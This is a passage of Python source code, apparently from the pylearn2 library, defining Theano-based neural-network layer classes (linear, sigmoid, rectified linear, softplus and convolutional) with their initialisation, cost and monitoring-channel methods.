row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval = OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ])
if (state_below is not None) or (state is not None):
if state is None:
P = self.fprop(state_below)
else:
P = state
if self.pool_size == 1:
vars_and_prefixes = [(P, '')]
else:
vars_and_prefixes = [(P, 'p_')]
for var, prefix in vars_and_prefixes:
v_max = var.max(axis=0)
v_min = var.min(axis=0)
v_mean = var.mean(axis=0)
v_range = v_max - v_min
# max_x.mean_u is "the mean over *u*nits of the max over
# e*x*amples" The x and u are included in the name because
# otherwise its hard to remember which axis is which when
# reading the monitor I use inner.outer rather than
# outer_of_inner or something like that because I want
# mean_x.* to appear next to each other in the alphabetical
# list, as these are commonly plotted together
for key, val in [('max_x.max_u', v_max.max()),
('max_x.mean_u', v_max.mean()),
('max_x.min_u', v_max.min()),
('min_x.max_u', v_min.max()),
('min_x.mean_u', v_min.mean()),
('min_x.min_u', v_min.min()),
('range_x.max_u', v_range.max()),
('range_x.mean_u', v_range.mean()),
('range_x.min_u', v_range.min()),
('mean_x.max_u', v_mean.max()),
('mean_x.mean_u', v_mean.mean()),
('mean_x.min_u', v_mean.min())]:
rval[prefix + key] = val
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
if self.requires_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
z = self.transformer.lmul(state_below) + self.b
if self.layer_name is not None:
z.name = self.layer_name + '_z'
p, h = max_pool_channels(z, self.pool_size)
p.name = self.layer_name + '_p_'
return p
class Linear(Layer):
"""
A "linear model" in machine learning terminology. This would be more
accurately described as an affine model because it adds an offset to
the output as well as doing a matrix multiplication. The output is:
output = T.dot(weights, input) + biases
This class may be used as the output layer of an MLP for regression.
    It may also be used as a hidden layer. Most hidden layer classes are
    subclasses of this class that apply a fixed nonlinearity to the
output of the affine transformation provided by this class.
One notable use of this class is to provide "bottleneck" layers.
By using a Linear layer with few hidden units followed by a nonlinear
layer such as RectifiedLinear with many hidden units, one essentially
gets a RectifiedLinear layer with a factored weight matrix, which can
reduce the number of parameters in the model (by making the effective
weight matrix low rank).
Parameters
----------
dim : int
The number of elements in the output of the layer.
layer_name : str
The name of the layer. All layers in an MLP must have a unique name.
irange : WRITEME
istdev : WRITEME
sparse_init : WRITEME
sparse_stdev : WRITEME
include_prob : float
Probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is
initialized to 0.
    init_bias : float or ndarray, optional
        Anything that can be broadcasted to a numpy vector.
Provides the initial value of the biases of the model.
When using this class as an output layer (specifically the Linear
class, or subclasses that don't change the output like
LinearGaussian, but not subclasses that change the output, like
Softmax) it can be a good idea to set this to the return value of
the `mean_of_targets` function. This provides the mean value of
all the targets in the training set, so the model is initialized
to a dummy model that predicts the expected value of each output
variable.
W_lr_scale : float, optional
Multiply the learning rate on the weights by this constant.
b_lr_scale : float, optional
Multiply the learning rate on the biases by this constant.
mask_weights : ndarray, optional
If provided, the weights will be multiplied by this mask after each
learning update.
max_row_norm : WRITEME
max_col_norm : WRITEME
min_col_norm : WRITEME
copy_input : REMOVED
use_abs_loss : bool, optional
If True, the cost function will be mean absolute error rather
than mean squared error.
You can think of mean squared error as fitting a Gaussian
distribution with variance 1, or as learning to predict the mean
of the data.
You can think of mean absolute error as fitting a Laplace
distribution with variance 1, or as learning to predict the
median of the data.
use_bias : bool, optional
If False, does not add the bias term to the output.
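    Examples
    --------
    >>> # Sketch of a low-rank "bottleneck" followed by a rectified layer
    >>> # (RectifiedLinear is defined later in this module).
    >>> # layers = [Linear(dim=50, layer_name='bottleneck', irange=0.05),
    >>> #           RectifiedLinear(dim=1000, layer_name='h0', irange=0.05)]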
"""
def __init__(self,
dim,
layer_name,
irange=None,
istdev=None,
sparse_init=None,
sparse_stdev=1.,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
mask_weights=None,
max_row_norm=None,
max_col_norm=None,
min_col_norm=None,
copy_input=None,
use_abs_loss=False,
use_bias=True):
if copy_input is not None:
raise AssertionError(
"The copy_input option had a bug and has "
"been removed from the library.")
super(Linear, self).__init__()
if use_bias and init_bias is None:
init_bias = 0.
self.__dict__.update(locals())
del self.self
if use_bias:
self.b = sharedX(np.zeros((self.dim,)) + init_bias,
name=(layer_name + '_b'))
else:
assert b_lr_scale is None
            assert init_bias is None
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if isinstance(space, VectorSpace):
self.requires_reformat = False
self.input_dim = space.dim
else:
self.requires_reformat = True
self.input_dim = space.get_total_dimension()
self.desired_space = VectorSpace(self.input_dim)
self.output_space = VectorSpace(self.dim)
rng = self.mlp.rng
if self.irange is not None:
assert self.istdev is None
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, self.dim)) * \
(rng.uniform(0., 1., (self.input_dim, self.dim))
< self.include_prob)
elif self.istdev is not None:
assert self.sparse_init is None
W = rng.randn(self.input_dim, self.dim) * self.istdev
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, self.dim))
def mask_rejects(idx, i):
if self.mask_weights is None:
return False
return self.mask_weights[idx, i] == 0.
for i in xrange(self.dim):
assert self.sparse_init <= self.input_dim
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0 or mask_rejects(idx, i):
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
W *= self.sparse_stdev
W = sharedX(W)
W.name = self.layer_name + '_W'
self.transformer = MatrixMul(W)
W, = self.transformer.get_params()
assert W.name is not None
if self.mask_weights is not None:
expected_shape = (self.input_dim, self.dim)
if expected_shape != self.mask_weights.shape:
raise ValueError("Expected mask with shape " +
str(expected_shape) + " but got " +
str(self.mask_weights.shape))
self.mask = sharedX(self.mask_weights)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.mask_weights is not None:
W, = self.transformer.get_params()
if W in updates:
updates[W] = updates[W] * self.mask
if self.max_row_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=1))
desired_norms = T.clip(row_norms, 0, self.max_row_norm)
scales = desired_norms / (1e-7 + row_norms)
updates[W] = updated_W * scales.dimshuffle(0, 'x')
if self.max_col_norm is not None or self.min_col_norm is not None:
assert self.max_row_norm is None
if self.max_col_norm is not None:
max_col_norm = self.max_col_norm
if self.min_col_norm is None:
self.min_col_norm = 0
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
col_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=0))
if self.max_col_norm is None:
max_col_norm = col_norms.max()
desired_norms = T.clip(col_norms,
self.min_col_norm,
max_col_norm)
updates[W] = updated_W * desired_norms / (1e-7 + col_norms)
@wraps(Layer.get_params)
def get_params(self):
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
if self.use_bias:
assert self.b.name is not None
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.get_weights)
def get_weights(self):
if self.requires_reformat:
# This is not really an unimplemented case.
# We actually don't know how to format the weights
# in design space. We got the data in topo space
# and we don't have access to the dataset
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.get_value()
return W
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
"""
.. todo::
WRITEME
"""
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
raise NotImplementedError()
W, = self.transformer.get_params()
W = W.T
W = W.reshape((self.dim, self.input_space.shape[0],
self.input_space.shape[1],
self.input_space.num_channels))
W = Conv2DSpace.convert(W, self.input_space.axes, ('b', 0, 1, 'c'))
return function([], W)()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
W, = self.transformer.get_params()
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval = OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ])
if (state is not None) or (state_below is not None):
if state is None:
state = self.fprop(state_below)
mx = state.max(axis=0)
mean = state.mean(axis=0)
mn = state.min(axis=0)
rg = mx - mn
rval['range_x_max_u'] = rg.max()
rval['range_x_mean_u'] = rg.mean()
rval['range_x_min_u'] = rg.min()
rval['max_x_max_u'] = mx.max()
rval['max_x_mean_u'] = mx.mean()
rval['max_x_min_u'] = mx.min()
rval['mean_x_max_u'] = mean.max()
rval['mean_x_mean_u'] = mean.mean()
rval['mean_x_min_u'] = mean.min()
rval['min_x_max_u'] = mn.max()
rval['min_x_mean_u'] = mn.mean()
rval['min_x_min_u'] = mn.min()
return rval
def _linear_part(self, state_below):
"""
Parameters
----------
state_below : member of input_space
Returns
-------
output : theano matrix
Affine transformation of state_below
"""
self.input_space.validate(state_below)
if self.requires_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
z = self.transformer.lmul(state_below)
if self.use_bias:
z += self.b
if self.layer_name is not None:
z.name = self.layer_name + '_z'
return z
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
return p
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return self.cost_from_cost_matrix(self.cost_matrix(Y, Y_hat))
@wraps(Layer.cost_from_cost_matrix)
def cost_from_cost_matrix(self, cost_matrix):
return cost_matrix.sum(axis=1).mean()
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
if(self.use_abs_loss):
return T.abs_(Y - Y_hat)
else:
return T.sqr(Y - Y_hat)
class Tanh(Linear):
"""
A layer that performs an affine transformation of its (vectorial)
input followed by a hyperbolic tangent elementwise nonlinearity.
Parameters
----------
kwargs : dict
Keyword arguments to pass through to `Linear` class constructor.
"""
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.tanh(p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class Sigmoid(Linear):
"""
A layer that performs an affine transformation of its
input followed by a logistic sigmoid elementwise nonlinearity.
Parameters
----------
monitor_style : string
Values can be any of ['detection', 'one_hot_class',
'bit_vector_class']
'detection' is the default.
- 'detection' : get_monitor_from_state makes no assumptions about
target, reports info about how good model is at
detecting positive bits.
This will monitor precision, recall, and F1 score
based on a detection threshold of 0.5. Note that
these quantities are computed *per-minibatch* and
averaged together. Unless your entire monitoring
dataset fits in one minibatch, this is not the same
as the true F1 score, etc., and will usually
seriously overestimate your performance.
- 'one_hot_class' : get_monitor_from_state assumes target is
one-hot class indicator, even though you're training the
model as k independent sigmoids. Gives info on how
good the argmax over the sigmoids behaves as a classifier.
- 'bit_vector_class' : get_monitor_from_state treats each
sigmoid as predicting a 1 iff its value is > 0.5. Each
example is counted as correct iff all of the bits in its
target are predicted correctly.
This includes as a special case the situation where the
target is a single 0 or 1 label.
- 'classification' : deprecated; originally this string was
used for 'one_hot_class', then due to a miscommunication
it was changed to be used for 'bit_vector_class'.
kwargs : dict
Passed through to the Layer class constructor
"""
def __init__(self, monitor_style='detection', **kwargs):
super(Sigmoid, self).__init__(**kwargs)
if monitor_style == 'classification':
monitor_style = 'bit_vector_class'
warnings.warn("The 'classification' monitor style is deprecated."
" Switch to 'bit_vector_class' (or possibly"
" 'one_hot_class' if your code predates 8f4b62b3df)."
" 'classification' may be removed on or after "
"2015-04-21.")
assert monitor_style in ['one_hot_class', 'bit_vector_class',
'detection']
self.monitor_style = monitor_style
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.nnet.sigmoid(p)
return p
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
"""
        Returns the mean, across units and across the batch, of the
        KL divergence between the targets Y and the model output Y_hat.
Parameters
----------
Y : theano.gof.Variable
Targets
Y_hat : theano.gof.Variable
Output of `fprop`
        Returns
        -------
        ave : Variable
            mean across units, mean across batch of KL divergence
Notes
-----
Uses KL(P || Q) where P is defined by Y and Q is defined by Y_hat
Currently Y must be purely binary. If it's not, you'll still
get the right gradient, but the value in the monitoring channel
will be wrong.
Y_hat must be generated by fprop, i.e., it must be a symbolic
sigmoid.
p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
For binary p, some terms drop out:
- p log q - (1-p) log (1-q)
- p log sigmoid(z) - (1-p) log sigmoid(-z)
p softplus(-z) + (1-p) softplus(z)
"""
total = self.kl(Y=Y, Y_hat=Y_hat)
ave = total.mean()
return ave
def kl(self, Y, Y_hat):
"""
Computes the KL divergence.
Parameters
----------
Y : Variable
targets for the sigmoid outputs. Currently Y must be purely binary.
If it's not, you'll still get the right gradient, but the
value in the monitoring channel will be wrong.
Y_hat : Variable
predictions made by the sigmoid layer. Y_hat must be generated by
fprop, i.e., it must be a symbolic sigmoid.
Returns
-------
        div : Variable
            Batch vector of the KL divergence for each example.
Notes
-----
Warning: This function expects a sigmoid nonlinearity in the
output layer and it uses kl function under pylearn2/expr/nnet/.
Returns a batch (vector) of mean across units of KL
divergence for each example,
KL(P || Q) where P is defined by Y and Q is defined by Y_hat:
p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
For binary p, some terms drop out:
- p log q - (1-p) log (1-q)
- p log sigmoid(z) - (1-p) log sigmoid(-z)
p softplus(-z) + (1-p) softplus(z)
"""
batch_axis = self.output_space.get_batch_axis()
div = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis)
return div
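    # Illustrative sketch (comment only, not part of the class API): for a
    # single unit the expression above is the binary cross-entropy written in
    # terms of the pre-sigmoid activation z. Assuming hypothetical scalar
    # values p (target) and z (pre-activation):
    #   >>> import numpy as np
    #   >>> p, z = 1.0, 2.0
    #   >>> softplus = lambda x: np.log1p(np.exp(x))
    #   >>> round(p * softplus(-z) + (1 - p) * softplus(z), 6)
    #   0.126928
    #   >>> round(-np.log(1.0 / (1.0 + np.exp(-z))), 6)  # -log sigmoid(z)
    #   0.126928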
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
rval = elemwise_kl(Y, Y_hat)
assert rval.ndim == 2
return rval
def get_detection_channels_from_state(self, state, target):
"""
Returns monitoring channels when using the layer to do detection
of binary events.
Parameters
----------
state : theano.gof.Variable
Output of `fprop`
target : theano.gof.Variable
The targets from the dataset
Returns
-------
channels : OrderedDict
Dictionary mapping channel names to Theano channel values.
"""
rval = OrderedDict()
y_hat = state > 0.5
y = target > 0.5
wrong_bit = T.cast(T.neq(y, y_hat), state.dtype)
rval['01_loss'] = wrong_bit.mean()
rval['kl'] = self.cost(Y_hat=state, Y=target)
y = T.cast(y, state.dtype)
y_hat = T.cast(y_hat, state.dtype)
tp = (y * y_hat).sum()
fp = ((1 - y) * y_hat).sum()
precision = compute_precision(tp, fp)
recall = compute_recall(y, tp)
f1 = compute_f1(precision, recall)
rval['precision'] = precision
rval['recall'] = recall
rval['f1'] = f1
tp = (y * y_hat).sum(axis=0)
fp = ((1 - y) * y_hat).sum(axis=0)
precision = compute_precision(tp, fp)
rval['per_output_precision_max'] = precision.max()
rval['per_output_precision_mean'] = precision.mean()
rval['per_output_precision_min'] = precision.min()
recall = compute_recall(y, tp)
rval['per_output_recall_max'] = recall.max()
rval['per_output_recall_mean'] = recall.mean()
rval['per_output_recall_min'] = recall.min()
f1 = compute_f1(precision, recall)
rval['per_output_f1_max'] = f1.max()
rval['per_output_f1_mean'] = f1.mean()
rval['per_output_f1_min'] = f1.min()
return rval
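    # Worked example of the detection channels (hypothetical counts, comment
    # only): with tp = 8 true positives, fp = 2 false positives and 10
    # positive targets, precision = tp / (tp + fp) = 0.8,
    # recall = tp / 10 = 0.8, and
    # f1 = 2 * precision * recall / (precision + recall) = 0.8.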
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = super(Sigmoid, self).get_layer_monitoring_channels(
state=state, targets=targets)
if (targets is not None) and \
((state_below is not None) or (state is not None)):
if state is None:
state = self.fprop(state_below)
if self.monitor_style == 'detection':
rval.update(self.get_detection_channels_from_state(state,
targets))
elif self.monitor_style == 'one_hot_class':
# For this monitor style, we know (by assumption) that
# exactly one bit is always on, so we pick
# the single most likely bit under the model, regardless
# of whether its probability exceeds 0.5
prediction = state.argmax(axis=1)
labels = targets.argmax(axis=1)
incorrect = T.neq(prediction, labels)
misclass = T.cast(incorrect, config.floatX).mean()
rval['misclass'] = misclass
else:
assert self.monitor_style == 'bit_vector_class'
# Threshold Y_hat at 0.5.
prediction = T.gt(state, 0.5)
# If even one feature is wrong for a given training example,
# it's considered incorrect, so we max over columns.
incorrect = T.neq(targets, prediction).max(axis=1)
rval['misclass'] = T.cast(incorrect, config.floatX).mean()
return rval
class RectifiedLinear(Linear):
"""
Rectified linear MLP layer (Glorot and Bengio 2011).
Parameters
----------
left_slope : float
The slope the line should have left of 0.
kwargs : dict
Keyword arguments to pass to `Linear` class constructor.
"""
def __init__(self, left_slope=0.0, **kwargs):
super(RectifiedLinear, self).__init__(**kwargs)
self.left_slope = left_slope
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
# Original: p = p * (p > 0.) + self.left_slope * p * (p < 0.)
# T.switch is faster.
# For details, see benchmarks in
# pylearn2/scripts/benchmark/time_relu.py
p = T.switch(p > 0., p, self.left_slope * p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
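# A minimal usage sketch (assumed sizes and layer names, not part of this
# module): the elementwise layers above are normally composed inside an MLP,
# e.g. a rectified linear hidden layer feeding a sigmoid output layer.
#   >>> from pylearn2.models.mlp import MLP, RectifiedLinear, Sigmoid
#   >>> mlp = MLP(nvis=100,
#   ...           layers=[RectifiedLinear(dim=50, layer_name='h0', irange=.05),
#   ...                   Sigmoid(dim=10, layer_name='y', irange=.05)])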
class Softplus(Linear):
"""
An MLP layer using the softplus nonlinearity
h = log(1 + exp(Wx + b))
Parameters
----------
kwargs : dict
Keyword arguments to `Linear` constructor.
"""
def __init__(self, **kwargs):
super(Softplus, self).__init__(**kwargs)
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.nnet.softplus(p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class SpaceConverter(Layer):
"""
A Layer with no parameters that converts the input from
one space to another.
Parameters
----------
layer_name : str
Name of the layer.
output_space : Space
The space to convert to.
"""
def __init__(self, layer_name, output_space):
super(SpaceConverter, self).__init__()
self.__dict__.update(locals())
del self.self
self._params = []
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
@wraps(Layer.fprop)
def fprop(self, state_below):
return self.input_space.format_as(state_below, self.output_space)
class ConvNonlinearity(object):
"""
Abstract convolutional nonlinearity class.
"""
def apply(self, linear_response):
"""
Applies the nonlinearity over the convolutional layer.
Parameters
----------
linear_response: Variable
linear response of the layer.
Returns
-------
p: Variable
the response of the layer after the activation function
            is applied.
"""
p = linear_response
return p
def _get_monitoring_channels_for_activations(self, state):
"""
Computes the monitoring channels which does not require targets.
Parameters
----------
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
Returns
-------
rval : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
rval = OrderedDict({})
mx = state.max(axis=0)
mean = state.mean(axis=0)
mn = state.min(axis=0)
rg = mx - mn
rval['range_x_max_u'] = rg.max()
rval['range_x_mean_u'] = rg.mean()
rval['range_x_min_u'] = rg.min()
rval['max_x_max_u'] = mx.max()
rval['max_x_mean_u'] = mx.mean()
rval['max_x_min_u'] = mx.min()
rval['mean_x_max_u'] = mean.max()
rval['mean_x_mean_u'] = mean.mean()
rval['mean_x_min_u'] = mean.min()
rval['min_x_max_u'] = mn.max()
rval['min_x_mean_u'] = mn.mean()
rval['min_x_min_u'] = mn.min()
return rval
def get_monitoring_channels_from_state(self, state, target,
cost_fn=None):
"""
Override the default get_monitoring_channels_from_state function.
Parameters
----------
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
target : member of self.output_space
Should be None unless this is the last layer.
If specified, it should be a minibatch of targets for the
last layer.
cost_fn : theano computational graph or None
This is the theano computational graph of a cost function.
Returns
-------
rval : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
rval = self._get_monitoring_channels_for_activations(state)
return rval
class IdentityConvNonlinearity(ConvNonlinearity):
"""
Linear convolutional nonlinearity class.
"""
def __init__(self):
self.non_lin_name = "linear"
@wraps(ConvNonlinearity.get_monitoring_channels_from_state)
def get_monitoring_channels_from_state(self,
state,
target,
cost_fn=False):
rval = super(IdentityConvNonlinearity,
self).get_monitoring_channels_from_state(state,
target,
cost_fn)
if target is not None:
prediction = T.gt(state, 0.5)
            incorrect = T.neq(target, prediction).max(axis=1)
rval["misclass"] = T.cast(incorrect, config.floatX).mean()
return rval
class RectifierConvNonlinearity(ConvNonlinearity):
"""
A simple rectifier nonlinearity class for convolutional layers.
Parameters
----------
left_slope : float
The slope of the left half of the activation function.
"""
def __init__(self, left_slope=0.0):
"""
Parameters
----------
left_slope : float, optional
left slope for the linear response of the rectifier function.
default is 0.0.
"""
self.non_lin_name = "rectifier"
self.left_slope = left_slope
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the rectifier nonlinearity over the convolutional layer.
"""
p = linear_response * (linear_response > 0.) + self.left_slope *\
linear_response * (linear_response < 0.)
return p
class SigmoidConvNonlinearity(ConvNonlinearity):
"""
Sigmoid nonlinearity class for convolutional layers.
Parameters
----------
monitor_style : str, optional
default monitor_style is "classification".
This determines whether to do classification or detection.
"""
def __init__(self, monitor_style="classification"):
assert monitor_style in ['classification', 'detection']
self.monitor_style = monitor_style
self.non_lin_name = "sigmoid"
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the sigmoid nonlinearity over the convolutional layer.
"""
p = T.nnet.sigmoid(linear_response)
return p
@wraps(ConvNonlinearity.get_monitoring_channels_from_state)
def get_monitoring_channels_from_state(self, state, target,
cost_fn=None):
rval = super(SigmoidConvNonlinearity,
self).get_monitoring_channels_from_state(state,
target,
cost_fn)
if target is not None:
y_hat = state > 0.5
y = target > 0.5
wrong_bit = T.cast(T.neq(y, y_hat), state.dtype)
rval['01_loss'] = wrong_bit.mean()
rval['kl'] = cost_fn(Y_hat=state, Y=target)
y = T.cast(y, state.dtype)
y_hat = T.cast(y_hat, state.dtype)
tp = (y * y_hat).sum()
fp = ((1 - y) * y_hat).sum()
precision = compute_precision(tp, fp)
recall = compute_recall(y, tp)
f1 = compute_f1(precision, recall)
rval['precision'] = precision
rval['recall'] = recall
rval['f1'] = f1
tp = (y * y_hat).sum(axis=[0, 1])
fp = ((1 - y) * y_hat).sum(axis=[0, 1])
precision = compute_precision(tp, fp)
rval['per_output_precision_max'] = precision.max()
rval['per_output_precision_mean'] = precision.mean()
rval['per_output_precision_min'] = precision.min()
recall = compute_recall(y, tp)
rval['per_output_recall_max'] = recall.max()
rval['per_output_recall_mean'] = recall.mean()
rval['per_output_recall_min'] = recall.min()
f1 = compute_f1(precision, recall)
rval['per_output_f1_max'] = f1.max()
rval['per_output_f1_mean'] = f1.mean()
rval['per_output_f1_min'] = f1.min()
return rval
class TanhConvNonlinearity(ConvNonlinearity):
"""
Tanh nonlinearity class for convolutional layers.
"""
def __init__(self):
self.non_lin_name = "tanh"
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the tanh nonlinearity over the convolutional layer.
"""
p = T.tanh(linear_response)
return p
class ConvElemwise(Layer):
"""
Generic convolutional elemwise layer.
Takes the ConvNonlinearity object as an argument and implements
convolutional layer with the specified nonlinearity.
This function can implement:
* Linear convolutional layer
* Rectifier convolutional layer
* Sigmoid convolutional layer
* Tanh convolutional layer
    based on the nonlinearity argument that it receives.
Parameters
----------
output_channels : int
The number of output channels the layer should have.
kernel_shape : tuple
The shape of the convolution kernel.
pool_shape : tuple
The shape of the spatial max pooling. A two-tuple of ints.
pool_stride : tuple
The stride of the spatial max pooling. Also must be square.
layer_name : str
A name for this layer that will be prepended to monitoring channels
related to this layer.
nonlinearity : object
An instance of a nonlinearity object which might be inherited
from the ConvNonlinearity class.
irange : float, optional
if specified, initializes each weight randomly in
U(-irange, irange)
border_mode : str, optional
A string indicating the size of the output:
- "full" : The output is the full discrete linear convolution of the
inputs.
- "valid" : The output consists only of those elements that do not
rely on the zero-padding. (Default)
sparse_init : WRITEME
include_prob : float, optional
probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is initialized
        to 0.
init_bias : float, optional
All biases are initialized to this number. Default is 0.
W_lr_scale : float or None
The learning rate on the weights for this layer is multiplied by this
scaling factor
b_lr_scale : float or None
The learning rate on the biases for this layer is multiplied by this
scaling factor
max_kernel_norm : float or None
If specified, each kernel is constrained to have at most this norm.
pool_type : str or None
        The type of the pooling operation performed after the convolution.
Default pooling type is max-pooling.
tied_b : bool, optional
If true, all biases in the same channel are constrained to be the
same as each other. Otherwise, each bias at each location is
learned independently. Default is true.
detector_normalization : callable or None
See `output_normalization`.
If pooling argument is not provided, detector_normalization
is not applied on the layer.
output_normalization : callable or None
if specified, should be a callable object. the state of the
network is optionally replaced with normalization(state) at each
        of the 2 points in processing:
            - detector: the detector units can be normalized prior to the
              spatial pooling
            - output: the output of the layer, after spatial pooling, can
be normalized as well
kernel_stride : 2-tuple of ints, optional
The stride of the convolution kernel. Default is (1, 1).
"""
def __init__(self,
output_channels,
kernel_shape,
layer_name,
nonlinearity,
irange=None,
border_mode='valid',
sparse_init=None,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
max_kernel_norm=None,
pool_type=None,
pool_shape=None,
pool_stride=None,
tied_b=None,
detector_normalization=None,
output_normalization=None,
kernel_stride=(1, 1),
monitor_style="classification"):
super(ConvElemwise, self).__init__()
if (irange is None) and (sparse_init is None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvElemwise.")
elif (irange is not None) and (sparse_init is not None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvElemwise and not both.")
if pool_type is not None:
assert pool_shape is not None, (
"You should specify the shape of "
"the spatial %s-pooling." % pool_type)
assert pool_stride is not None, (
"You should specify the strides of "
"the spatial %s-pooling." % pool_type)
assert nonlinearity is not None
self.nonlin = nonlinearity
self.__dict__.update(locals())
assert monitor_style in ['classification', 'detection'], (
"%s.monitor_style should be either"
"detection or classification" % self.__class__.__name__)
del self.self
def initialize_transformer(self, rng):
"""
This function initializes the transformer of the class. Re-running
this function will reset the transformer.
Parameters
----------
rng : object
random number generator object.
"""
if self.irange is not None:
assert self.sparse_init is None
self.transformer = conv2d.make_random_conv2D(
irange=self.irange,
input_space=self.input_space,
output_space=self.detector_space,
kernel_shape=self.kernel_shape,
subsample=self.kernel_stride,
border_mode=self.border_mode,
rng=rng)
elif self.sparse_init is not None:
self.transformer = conv2d.make_sparse_random_conv2D(
num_nonzero=self.sparse_init,
input_space=self.input_space,
output_space=self.detector_space,
kernel_shape=self.kernel_shape,
subsample=self.kernel_stride,
border_mode=self.border_mode,
rng=rng)
def initialize_output_space(self):
"""
Initializes the output space of the ConvElemwise layer by taking
pooling operator and the hyperparameters of the convolutional layer
into consideration as well.
"""
dummy_batch_size = self.mlp.batch_size
if dummy_batch_size is None:
dummy_batch_size = 2
dummy_detector =\
sharedX(self.detector_space.get_origin_batch(dummy_batch_size))
if self.pool_type is not None:
assert self.pool_type in ['max', 'mean']
if self.pool_type == 'max':
dummy_p = max_pool(bc01=dummy_detector,
pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
elif self.pool_type == 'mean':
dummy_p = mean_pool(bc01=dummy_detector,
pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
dummy_p = dummy_p.eval()
self.output_space = Conv2DSpace(shape=[dummy_p.shape[2],
dummy_p.shape[3]],
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
else:
